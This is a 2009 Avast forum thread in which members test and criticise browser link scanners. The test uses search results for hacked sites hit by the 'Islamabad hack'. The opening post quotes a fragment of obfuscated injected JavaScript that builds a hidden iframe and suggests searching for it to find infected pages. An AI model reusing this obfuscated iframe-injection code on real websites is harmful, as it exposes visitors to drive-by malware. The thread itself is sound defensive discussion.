« previous next »
Pages: [1]   Go Down

Author Topic: What is the use of browser link scanners - How reliable are they?  (Read 2069 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
What is the use of browser link scanners - How reliable are they?
« on: July 08, 2009, 06:52:11 PM »
Hi malware fighters,

I tested the following part of malcode that was reported in the virus and worms section from a find on a hacked legit web site as a google search request to see how links scanners would react to these pages that avast would flag and then disconnect from. The results are not very reassuring.
This was the request you can put it into your google searchform and see for yourself (Do not click on the result pages given as green, cause all may be infected through the so-called Islamabad hack!)
Code: [Select]
var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22 was the search query.
On the first result page the first two did not count because they were from avast forum.
Best performance was finjan 2 flagged as potential virus can harm your computer on three result pages.
One result flagged by WOT but not because of the code but because of the site's reputation, one yellow for another one. McAfeeSiteAdvisor missed all.
DrWeb's av link checker missed these because the malcode was not in the same domain...

So if you want to use a link checker I would choose finjan secure browsing, but the performance of this scanner is even poor. Best is the avast live browser shield scanning. And also the full protection of Firefox browser with NoScript and RequestPolicy add-ons installed.

My opinion of the present pre-link scanning results - pretty worthless in this case,

polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: What is the use of browser link scanners - How reliable are they?
« Reply #1 on: July 08, 2009, 07:14:09 PM »
Quote from: polonus on July 08, 2009, 06:52:11 PM
Best performance was finjan 2 flagged as potential virus can harm your computer on three result pages.
One result flagged by WOT but not because of the code but because of the site's reputation, one yellow for another one. McAfeeSiteAdvisor missed all.
DrWeb's av link checker missed these because the malcode was not in the same domain...
I'm glad to have chosen Finjan + avast ;)
Logged
The best things in life are free.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Re: What is the use of browser link scanners - How reliable are they?
« Reply #2 on: July 09, 2009, 12:47:00 AM »
Hi malare fighters.

But did you perform the test. Just try and give in the short bit of that particular code in as a search query that is scanned through finjan, WOT, or on scandoo.com and you will establish how poorly these "real time scanners" or partly reputation scanners handle code on legit sites that were hacked and re-direct to "malware all sorts" on behalf of CyberCrime & Co et al.
That is the new situation, my good forum friends, a new massive threat that goes largely unnoticed by these scanners (80%). At http://www.unmaskparasites.com/security-report/ based on Google's security website report I get a much better score here and an indication of what is wrong and attached to the source code, and real scanners like Anubis also givethese in depth report.
Even with Firekeeper with appropriate rules for detecting malcode the results would be better. What do link scanners do other than link, not much. They do not tell that on site so-and-so I will be confronted with obfuscated script, that I would like to deny access, that there is third party embedded script there, that I like to refuse anyway, or hidden iFrames that might take me to a silent download site with a dozen malcode scripts trying out exploits on my unpatched browser and other software vulnerabilities that I failed to update (I check that now with Secunia's PSI). So NoScript is on one side of the spectrum protecting me. What is there on the otherside of the spectrum, the detecting side? I do not want to be a victim of some self-proclaimed website admin that does not know how to secure his code or protect his website software. Well, old pol knows how to protect himself through SafeHex, limiting access to what should not have access on the OS, limiting rights to what should not have, and denying access to code to block malicious code insertions, but that cannot harm me much because normally malware can do as much harm as limited under normal user's rights (so even curtail system rights in certain circumstances). But what about the average user of a browser? Can they rely on the link scanner greens or halt for reds? I would not like to have these on a railway track, if I run a train like that a derailment would be round the corner I think. A lot of security here is make-believe, folks, you rely on a validation made at a certain point in time and then the assessment can be totally wrong in a large percentage of cases,

polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
Pages: [1]   Go Up
« previous next »